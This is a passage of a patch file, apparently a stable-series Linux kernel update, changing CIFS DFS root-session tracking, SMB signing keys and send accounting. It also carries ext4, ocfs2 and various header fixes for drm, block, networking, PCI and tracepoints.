+ 	struct dfs_cache_tgt_iterator *tit;
+ 	struct TCP_Server_Info *server;
++	struct cifs_tcon *tcon;
+ 	char *origin_fullpath = NULL;
+ 	int num_links = 0;
+ 	int rc;
+@@ -234,12 +245,22 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 
+ 	if (!rc) {
+ 		server = mnt_ctx->server;
++		tcon = mnt_ctx->tcon;
+ 
+ 		mutex_lock(&server->refpath_lock);
+-		server->origin_fullpath = origin_fullpath;
+-		server->current_fullpath = server->leaf_fullpath;
++		if (!server->origin_fullpath) {
++			server->origin_fullpath = origin_fullpath;
++			server->current_fullpath = server->leaf_fullpath;
++			origin_fullpath = NULL;
++		}
+ 		mutex_unlock(&server->refpath_lock);
+-		origin_fullpath = NULL;
++
++		if (list_empty(&tcon->dfs_ses_list)) {
++			list_replace_init(&mnt_ctx->dfs_ses_list,
++					  &tcon->dfs_ses_list);
++		} else {
++			dfs_put_root_smb_sessions(&mnt_ctx->dfs_ses_list);
++		}
+ 	}
+ 
+ out:
+@@ -260,7 +281,7 @@ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ 	rc = get_session(mnt_ctx, NULL);
+ 	if (rc)
+ 		return rc;
+-	mnt_ctx->root_ses = mnt_ctx->ses;
++	ctx->dfs_root_ses = mnt_ctx->ses;
+ 	/*
+ 	 * If called with 'nodfs' mount option, then skip DFS resolving.  Otherwise unconditionally
+ 	 * try to get an DFS referral (even cached) to determine whether it is an DFS mount.
+@@ -280,7 +301,9 @@ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ 	}
+ 
+ 	*isdfs = true;
+-	set_root_ses(mnt_ctx);
++	rc = get_root_smb_session(mnt_ctx);
++	if (rc)
++		return rc;
+ 
+ 	return __dfs_mount_share(mnt_ctx);
+ }
+diff --git a/fs/cifs/dfs.h b/fs/cifs/dfs.h
+index 344bea6d8bab1..13f26e01f7b97 100644
+--- a/fs/cifs/dfs.h
++++ b/fs/cifs/dfs.h
+@@ -10,6 +10,11 @@
+ #include "fs_context.h"
+ #include "cifs_unicode.h"
+ 
++struct dfs_root_ses {
++	struct list_head list;
++	struct cifs_ses *ses;
++};
++
+ int dfs_parse_target_referral(const char *full_path, const struct dfs_info3_param *ref,
+ 			      struct smb3_fs_context *ctx);
+ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs);
+@@ -22,9 +27,10 @@ static inline char *dfs_get_path(struct cifs_sb_info *cifs_sb, const char *path)
+ static inline int dfs_get_referral(struct cifs_mount_ctx *mnt_ctx, const char *path,
+ 				   struct dfs_info3_param *ref, struct dfs_cache_tgt_list *tl)
+ {
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+ 
+-	return dfs_cache_find(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
++	return dfs_cache_find(mnt_ctx->xid, ctx->dfs_root_ses, cifs_sb->local_nls,
+ 			      cifs_remap(cifs_sb), path, ref, tl);
+ }
+ 
+@@ -43,4 +49,15 @@ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ 							true);
+ }
+ 
++static inline void dfs_put_root_smb_sessions(struct list_head *head)
++{
++	struct dfs_root_ses *root, *tmp;
++
++	list_for_each_entry_safe(root, tmp, head, list) {
++		list_del_init(&root->list);
++		cifs_put_smb_ses(root->ses);
++		kfree(root);
++	}
++}
++
+ #endif /* _CIFS_DFS_H */
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index ac86bd0ebd637..1c59811bfa73a 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -49,17 +49,6 @@ struct cache_entry {
+ 	struct cache_dfs_tgt *tgthint;
+ };
+ 
+-/* List of referral server sessions per dfs mount */
+-struct mount_group {
+-	struct list_head list;
+-	uuid_t id;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES];
+-	int num_sessions;
+-	spinlock_t lock;
+-	struct list_head refresh_list;
+-	struct kref refcount;
+-};
+-
+ static struct kmem_cache *cache_slab __read_mostly;
+ static struct workqueue_struct *dfscache_wq __read_mostly;
+ 
+@@ -76,85 +65,10 @@ static atomic_t cache_count;
+ static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
+ static DECLARE_RWSEM(htable_rw_lock);
+ 
+-static LIST_HEAD(mount_group_list);
+-static DEFINE_MUTEX(mount_group_list_lock);
+-
+ static void refresh_cache_worker(struct work_struct *work);
+ 
+ static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
+ 
+-static void __mount_group_release(struct mount_group *mg)
+-{
+-	int i;
+-
+-	for (i = 0; i < mg->num_sessions; i++)
+-		cifs_put_smb_ses(mg->sessions[i]);
+-	kfree(mg);
+-}
+-
+-static void mount_group_release(struct kref *kref)
+-{
+-	struct mount_group *mg = container_of(kref, struct mount_group, refcount);
+-
+-	mutex_lock(&mount_group_list_lock);
+-	list_del(&mg->list);
+-	mutex_unlock(&mount_group_list_lock);
+-	__mount_group_release(mg);
+-}
+-
+-static struct mount_group *find_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	list_for_each_entry(mg, &mount_group_list, list) {
+-		if (uuid_equal(&mg->id, id))
+-			return mg;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-static struct mount_group *__get_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mg = find_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		return mg;
+-
+-	mg = kmalloc(sizeof(*mg), GFP_KERNEL);
+-	if (!mg)
+-		return ERR_PTR(-ENOMEM);
+-	kref_init(&mg->refcount);
+-	uuid_copy(&mg->id, id);
+-	mg->num_sessions = 0;
+-	spin_lock_init(&mg->lock);
+-	list_add(&mg->list, &mount_group_list);
+-	return mg;
+-}
+-
+-static struct mount_group *get_mount_group(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = __get_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		kref_get(&mg->refcount);
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	return mg;
+-}
+-
+-static void free_mount_group_list(void)
+-{
+-	struct mount_group *mg, *tmp_mg;
+-
+-	list_for_each_entry_safe(mg, tmp_mg, &mount_group_list, list) {
+-		list_del_init(&mg->list);
+-		__mount_group_release(mg);
+-	}
+-}
+-
+ /**
+  * dfs_cache_canonical_path - get a canonical DFS path
+  *
+@@ -704,7 +618,6 @@ void dfs_cache_destroy(void)
+ {
+ 	cancel_delayed_work_sync(&refresh_task);
+ 	unload_nls(cache_cp);
+-	free_mount_group_list();
+ 	flush_cache_ents();
+ 	kmem_cache_destroy(cache_slab);
+ 	destroy_workqueue(dfscache_wq);
+@@ -1111,54 +1024,6 @@ out_unlock:
+ 	return rc;
+ }
+ 
+-/**
+- * dfs_cache_add_refsrv_session - add SMB session of referral server
+- *
+- * @mount_id: mount group uuid to lookup.
+- * @ses: reference counted SMB session of referral server.
+- */
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses)
+-{
+-	struct mount_group *mg;
+-
+-	if (WARN_ON_ONCE(!mount_id || uuid_is_null(mount_id) || !ses))
+-		return;
+-
+-	mg = get_mount_group(mount_id);
+-	if (WARN_ON_ONCE(IS_ERR(mg)))
+-		return;
+-
+-	spin_lock(&mg->lock);
+-	if (mg->num_sessions < ARRAY_SIZE(mg->sessions))
+-		mg->sessions[mg->num_sessions++] = ses;
+-	spin_unlock(&mg->lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+-/**
+- * dfs_cache_put_refsrv_sessions - put all referral server sessions
+- *
+- * Put all SMB sessions from the given mount group id.
+- *
+- * @mount_id: mount group uuid to lookup.
+- */
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id)
+-{
+-	struct mount_group *mg;
+-
+-	if (!mount_id || uuid_is_null(mount_id))
+-		return;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = find_mount_group_locked(mount_id);
+-	if (IS_ERR(mg)) {
+-		mutex_unlock(&mount_group_list_lock);
+-		return;
+-	}
+-	mutex_unlock(&mount_group_list_lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+ /* Extract share from DFS target and return a pointer to prefix path or NULL */
+ static const char *parse_target_share(const char *target, char **share)
+ {
+@@ -1384,11 +1249,6 @@ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
+ 		cifs_dbg(FYI, "%s: not a dfs mount\n", __func__);
+ 		return 0;
+ 	}
+-
+-	if (uuid_is_null(&cifs_sb->dfs_mount_id)) {
+-		cifs_dbg(FYI, "%s: no dfs mount group id\n", __func__);
+-		return -EINVAL;
+-	}
+ 	/*
+ 	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
+ 	 * serverino. This prevents dentry revalidation to think the dentry are stale (ESTALE).
+diff --git a/fs/cifs/dfs_cache.h b/fs/cifs/dfs_cache.h
+index be3b5a44cf827..e0d39393035a9 100644
+--- a/fs/cifs/dfs_cache.h
++++ b/fs/cifs/dfs_cache.h
+@@ -40,8 +40,6 @@ int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iter
+ 			       struct dfs_info3_param *ref);
+ int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
+ 			    char **prefix);
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id);
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses);
+ char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
+ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index 44cb5639ed3ba..1b8d4e27f831c 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -265,6 +265,7 @@ struct smb3_fs_context {
+ 	bool rootfs:1; /* if it's a SMB root file system */
+ 	bool witness:1; /* use witness protocol */
+ 	char *leaf_fullpath;
++	struct cifs_ses *dfs_root_ses;
+ };
+ 
+ extern const struct fs_parameter_spec smb3_fs_parameters[];
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index ae0679f0c0d25..9f4486b705d5c 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -22,6 +22,7 @@
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dns_resolve.h"
+ #include "dfs_cache.h"
++#include "dfs.h"
+ #endif
+ #include "fs_context.h"
+ #include "cached_dir.h"
+@@ -134,6 +135,9 @@ tconInfoAlloc(void)
+ 	spin_lock_init(&ret_buf->stat_lock);
+ 	atomic_set(&ret_buf->num_local_opens, 0);
+ 	atomic_set(&ret_buf->num_remote_opens, 0);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	INIT_LIST_HEAD(&ret_buf->dfs_ses_list);
++#endif
+ 
+ 	return ret_buf;
+ }
+@@ -149,6 +153,9 @@ tconInfoFree(struct cifs_tcon *tcon)
+ 	atomic_dec(&tconInfoAllocCount);
+ 	kfree(tcon->nativeFileSystem);
+ 	kfree_sensitive(tcon->password);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_put_root_smb_sessions(&tcon->dfs_ses_list);
++#endif
+ 	kfree(tcon);
+ }
+ 
+@@ -1357,6 +1364,7 @@ int cifs_inval_name_dfs_link_error(const unsigned int xid,
+ 		 * removing cached DFS targets that the client would eventually
+ 		 * need during failover.
+ 		 */
++		ses = CIFS_DFS_ROOT_SES(ses);
+ 		if (ses->server->ops->get_dfs_refer &&
+ 		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
+ 						     &num_refs, cifs_sb->local_nls,
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 9b956294e8643..8dd3791b5c538 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -234,15 +234,32 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		size[0] = 8; /* sizeof __le64 */
+ 		data[0] = ptr;
+ 
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_END_OF_FILE_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
++		if (cfile) {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++		} else {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						COMPOUND_FID,
++						COMPOUND_FID,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
+ 		if (rc)
+ 			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
++		num_rqst++;
+ 		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
+ 		break;
+ 	case SMB2_OP_SET_INFO:
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index 381babc1212c9..d827b7547ffad 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -425,7 +425,7 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 
+ 		/* safe to access primary channel, since it will never go away */
+ 		spin_lock(&ses->chan_lock);
+-		memcpy(ses->chans[0].signkey, ses->smb3signingkey,
++		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
+ 		       SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
+ 
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+index 3851d0aaa2886..c961b90f92b9f 100644
+--- a/fs/cifs/transport.c
++++ b/fs/cifs/transport.c
+@@ -297,7 +297,7 @@ static int
+ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		struct smb_rqst *rqst)
+ {
+-	int rc = 0;
++	int rc;
+ 	struct kvec *iov;
+ 	int n_vec;
+ 	unsigned int send_length = 0;
+@@ -308,6 +308,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 	struct msghdr smb_msg = {};
+ 	__be32 rfc1002_marker;
+ 
++	cifs_in_send_inc(server);
+ 	if (cifs_rdma_enabled(server)) {
+ 		/* return -EAGAIN when connecting or reconnecting */
+ 		rc = -EAGAIN;
+@@ -316,14 +317,17 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		goto smbd_done;
+ 	}
+ 
++	rc = -EAGAIN;
+ 	if (ssocket == NULL)
+-		return -EAGAIN;
++		goto out;
+ 
++	rc = -ERESTARTSYS;
+ 	if (fatal_signal_pending(current)) {
+ 		cifs_dbg(FYI, "signal pending before send request\n");
+-		return -ERESTARTSYS;
++		goto out;
+ 	}
+ 
++	rc = 0;
+ 	/* cork the socket */
+ 	tcp_sock_set_cork(ssocket->sk, true);
+ 
+@@ -434,7 +438,8 @@ smbd_done:
+ 			 rc);
+ 	else if (rc > 0)
+ 		rc = 0;
+-
++out:
++	cifs_in_send_dec(server);
+ 	return rc;
+ }
+ 
+@@ -853,9 +858,7 @@ cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+ 	 * I/O response may come back and free the mid entry on another thread.
+ 	 */
+ 	cifs_save_when_sent(mid);
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, 1, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	if (rc < 0) {
+ 		revert_current_mid(server, mid->credits);
+@@ -1146,9 +1149,7 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 		else
+ 			midQ[i]->callback = cifs_compound_last_callback;
+ 	}
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, num_rqst, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	for (i = 0; i < num_rqst; i++)
+ 		cifs_save_when_sent(midQ[i]);
+@@ -1398,9 +1399,7 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+ 
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+@@ -1541,9 +1540,7 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 	}
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 7cc3918e2f189..604ee458f31d7 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3884,10 +3884,8 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval) {
+-			inode_unlock(old.inode);
++		if (retval)
+ 			goto end_rename;
+-		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index c81fa0fa9901a..e79ca9ef98316 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -5967,8 +5967,11 @@ static int ext4_load_journal(struct super_block *sb,
+ 	if (!really_read_only && journal_devnum &&
+ 	    journal_devnum != le32_to_cpu(es->s_journal_dev)) {
+ 		es->s_journal_dev = cpu_to_le32(journal_devnum);
+-
+-		/* Make sure we flush the recovery flag to disk. */
++		ext4_commit_super(sb);
++	}
++	if (!really_read_only && journal_inum &&
++	    journal_inum != le32_to_cpu(es->s_journal_inum)) {
++		es->s_journal_inum = cpu_to_le32(journal_inum);
+ 		ext4_commit_super(sb);
+ 	}
+ 
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 494994d9a332b..f66c3fae90584 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -388,6 +388,17 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 	struct inode *inode;
+ 	int err;
+ 
++	/*
++	 * We have to check for this corruption early as otherwise
++	 * iget_locked() could wait indefinitely for the state of our
++	 * parent inode.
++	 */
++	if (parent->i_ino == ea_ino) {
++		ext4_error(parent->i_sb,
++			   "Parent and EA inode have the same ino %lu", ea_ino);
++		return -EFSCORRUPTED;
++	}
++
+ 	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_NORMAL);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+diff --git a/fs/ocfs2/aops.c b/fs/ocfs2/aops.c
+index 1d65f6ef00ca8..0394505fdce3f 100644
+--- a/fs/ocfs2/aops.c
++++ b/fs/ocfs2/aops.c
+@@ -1977,11 +1977,26 @@ int ocfs2_write_end_nolock(struct address_space *mapping,
+ 	}
+ 
+ 	if (unlikely(copied < len) && wc->w_target_page) {
++		loff_t new_isize;
++
+ 		if (!PageUptodate(wc->w_target_page))
+ 			copied = 0;
+ 
+-		ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
+-				       start+len);
++		new_isize = max_t(loff_t, i_size_read(inode), pos + copied);
++		if (new_isize > page_offset(wc->w_target_page))
++			ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
++					       start+len);
++		else {
++			/*
++			 * When the page is fully beyond the new isize (data
++			 * copy failed), do not bother zeroing the page.
++			 * Invalidate it instead so that writeback does not
++			 * get confused and put the page & buffer dirty bits
++			 * into an inconsistent state.
++			 */
++			block_invalidate_folio(page_folio(wc->w_target_page),
++						0, PAGE_SIZE);
++		}
+ 	}
+ 	if (wc->w_target_page)
+ 		flush_dcache_page(wc->w_target_page);
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 6b65b0dfb4fb4..288c6feda5de2 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -447,11 +447,11 @@ struct drm_bridge_funcs {
+ 	 *
+ 	 * The returned array must be allocated with kmalloc() and will be
+ 	 * freed by the caller. If the allocation fails, NULL should be
+-	 * returned. num_output_fmts must be set to the returned array size.
++	 * returned. num_input_fmts must be set to the returned array size.
+ 	 * Formats listed in the returned array should be listed in decreasing
+ 	 * preference order (the core will try all formats until it finds one
+ 	 * that works). When the format is not supported NULL should be
+-	 * returned and num_output_fmts should be set to 0.
++	 * returned and num_input_fmts should be set to 0.
+ 	 *
+ 	 * This method is called on all elements of the bridge chain as part of
+ 	 * the bus format negotiation process that happens in
+diff --git a/include/drm/drm_gem.h b/include/drm/drm_gem.h
+index a17c2f903f81e..b46ade8124436 100644
+--- a/include/drm/drm_gem.h
++++ b/include/drm/drm_gem.h
+@@ -475,7 +475,9 @@ int drm_gem_dumb_map_offset(struct drm_file *file, struct drm_device *dev,
+ void drm_gem_lru_init(struct drm_gem_lru *lru, struct mutex *lock);
+ void drm_gem_lru_remove(struct drm_gem_object *obj);
+ void drm_gem_lru_move_tail(struct drm_gem_lru *lru, struct drm_gem_object *obj);
+-unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru,
++			       unsigned int nr_to_scan,
++			       unsigned long *remaining,
+ 			       bool (*shrink)(struct drm_gem_object *obj));
+ 
+ #endif /* __DRM_GEM_H__ */
+diff --git a/include/linux/blk-mq.h b/include/linux/blk-mq.h
+index 779fba613bd09..19ae71f3fb97d 100644
+--- a/include/linux/blk-mq.h
++++ b/include/linux/blk-mq.h
+@@ -228,6 +228,12 @@ static inline unsigned short req_get_ioprio(struct request *req)
+ 	*(listptr) = rq;				\
+ } while (0)
+ 
++#define rq_list_add_tail(lastpptr, rq)	do {		\
++	(rq)->rq_next = NULL;				\
++	**(lastpptr) = rq;				\
++	*(lastpptr) = &rq->rq_next;			\
++} while (0)
++
+ #define rq_list_pop(listptr)				\
+ ({							\
+ 	struct request *__req = NULL;			\
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 43d4e073b1115..c3e066242941d 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -1434,11 +1434,10 @@ static inline void blk_wake_io_task(struct task_struct *waiter)
+ 		wake_up_process(waiter);
+ }
+ 
+-unsigned long bdev_start_io_acct(struct block_device *bdev,
+-				 unsigned int sectors, enum req_op op,
++unsigned long bdev_start_io_acct(struct block_device *bdev, enum req_op op,
+ 				 unsigned long start_time);
+ void bdev_end_io_acct(struct block_device *bdev, enum req_op op,
+-		unsigned long start_time);
++		      unsigned int sectors, unsigned long start_time);
+ 
+ unsigned long bio_start_io_acct(struct bio *bio);
+ void bio_end_io_acct_remapped(struct bio *bio, unsigned long start_time,
+diff --git a/include/linux/fb.h b/include/linux/fb.h
+index 73eb1f85ea8e5..05e40fcc76964 100644
+--- a/include/linux/fb.h
++++ b/include/linux/fb.h
+@@ -212,6 +212,7 @@ struct fb_deferred_io {
+ 	/* delay between mkwrite and deferred handler */
+ 	unsigned long delay;
+ 	bool sort_pagereflist; /* sort pagelist by offset */
++	int open_count; /* number of opened files; protected by fb_info lock */
+ 	struct mutex lock; /* mutex that protects the pageref list */
+ 	struct list_head pagereflist; /* list of pagerefs for touched pages */
+ 	/* callback */
+diff --git a/include/linux/interconnect-provider.h b/include/linux/interconnect-provider.h
+index cd5c5a27557f5..d12cd18aab3f4 100644
+--- a/include/linux/interconnect-provider.h
++++ b/include/linux/interconnect-provider.h
+@@ -122,6 +122,9 @@ int icc_link_destroy(struct icc_node *src, struct icc_node *dst);
+ void icc_node_add(struct icc_node *node, struct icc_provider *provider);
+ void icc_node_del(struct icc_node *node);
+ int icc_nodes_remove(struct icc_provider *provider);
++void icc_provider_init(struct icc_provider *provider);
++int icc_provider_register(struct icc_provider *provider);
++void icc_provider_deregister(struct icc_provider *provider);
+ int icc_provider_add(struct icc_provider *provider);
+ void icc_provider_del(struct icc_provider *provider);
+ struct icc_node_data *of_icc_get_from_provider(struct of_phandle_args *spec);
+@@ -167,6 +170,15 @@ static inline int icc_nodes_remove(struct icc_provider *provider)
+ 	return -ENOTSUPP;
+ }
+ 
++static inline void icc_provider_init(struct icc_provider *provider) { }
++
++static inline int icc_provider_register(struct icc_provider *provider)
++{
++	return -ENOTSUPP;
++}
++
++static inline void icc_provider_deregister(struct icc_provider *provider) { }
++
+ static inline int icc_provider_add(struct icc_provider *provider)
+ {
+ 	return -ENOTSUPP;
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index e6e02184c25a4..84668547fee63 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -295,9 +295,11 @@ struct hh_cache {
+  * relationship HH alignment <= LL alignment.
+  */
+ #define LL_RESERVED_SPACE(dev) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom)&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ #define LL_RESERVED_SPACE_EXTRA(dev,extra) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom+(extra))&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom) + (extra)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ 
+ struct header_ops {
+ 	int	(*create) (struct sk_buff *skb, struct net_device *dev,
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 50042ea8e0083..db6ec828aa4b2 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1437,6 +1437,7 @@ void pci_bus_add_resource(struct pci_bus *bus, struct resource *res,
+ 			  unsigned int flags);
+ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n);
+ void pci_bus_remove_resources(struct pci_bus *bus);
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res);
+ int devm_request_pci_bus_resources(struct device *dev,
+ 				   struct list_head *resources);
+ 
+diff --git a/include/linux/sh_intc.h b/include/linux/sh_intc.h
+index c255273b02810..37ad81058d6ae 100644
+--- a/include/linux/sh_intc.h
++++ b/include/linux/sh_intc.h
+@@ -97,7 +97,10 @@ struct intc_hw_desc {
+ 	unsigned int nr_subgroups;
+ };
+ 
+-#define _INTC_ARRAY(a) a, __same_type(a, NULL) ? 0 : sizeof(a)/sizeof(*a)
++#define _INTC_SIZEOF_OR_ZERO(a) (_Generic(a,                 \
++                                 typeof(NULL):  0,           \
++                                 default:       sizeof(a)))
++#define _INTC_ARRAY(a) a, _INTC_SIZEOF_OR_ZERO(a)/sizeof(*a)
+ 
+ #define INTC_HW_DESC(vectors, groups, mask_regs,	\
+ 		     prio_regs,	sense_regs, ack_regs)	\
+diff --git a/include/linux/tracepoint.h b/include/linux/tracepoint.h
+index 4b33b95eb8be7..b01421902cfce 100644
+--- a/include/linux/tracepoint.h
++++ b/include/linux/tracepoint.h
+@@ -231,12 +231,11 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+  * not add unwanted padding between the beginning of the section and the
+  * structure. Force alignment to the same alignment as the section start.
+  *
+- * When lockdep is enabled, we make sure to always do the RCU portions of
+- * the tracepoint code, regardless of whether tracing is on. However,
+- * don't check if the condition is false, due to interaction with idle
+- * instrumentation. This lets us find RCU issues triggered with tracepoints
+- * even when this tracepoint is off. This code has no purpose other than
+- * poking RCU a bit.
++ * When lockdep is enabled, we make sure to always test whether RCU is
++ * "watching", regardless of whether the tracepoint is enabled. Tracepoints
++ * require RCU to be active, and it should always warn at the tracepoint
++ * site if it is not watching, as it will need to be active when the
++ * tracepoint is enabled.
+  */
+ #define __DECLARE_TRACE(name, proto, args, cond, data_proto)		\
+ 	extern int __traceiter_##name(data_proto);			\
+@@ -249,9 +248,7 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+ 				TP_ARGS(args),				\
+ 				TP_CONDITION(cond), 0);			\
+ 		if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) {		\
+-			rcu_read_lock_sched_notrace();			\
+-			rcu_dereference_sched(__tracepoint_##name.funcs);\
+-			rcu_read_unlock_sched_notrace();		\
++			WARN_ON_ONCE(!rcu_is_watching());		\
+ 		}							\
+ 	}								\
+ 	__DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args),		\
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index 3642b8e3928b7..15169d75c251e 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -145,6 +145,7 @@ struct scsi_device {
+ 	const char * model;		/* ... after scan; point to static string */
+ 	const char * rev;		/* ... "nullnullnullnull" before scan */
+ 
++#define SCSI_DEFAULT_VPD_LEN	255	/* default SCSI VPD page size (max) */
+ 	struct scsi_vpd __rcu *vpd_pg0;
+ 	struct scsi_vpd __rcu *vpd_pg83;
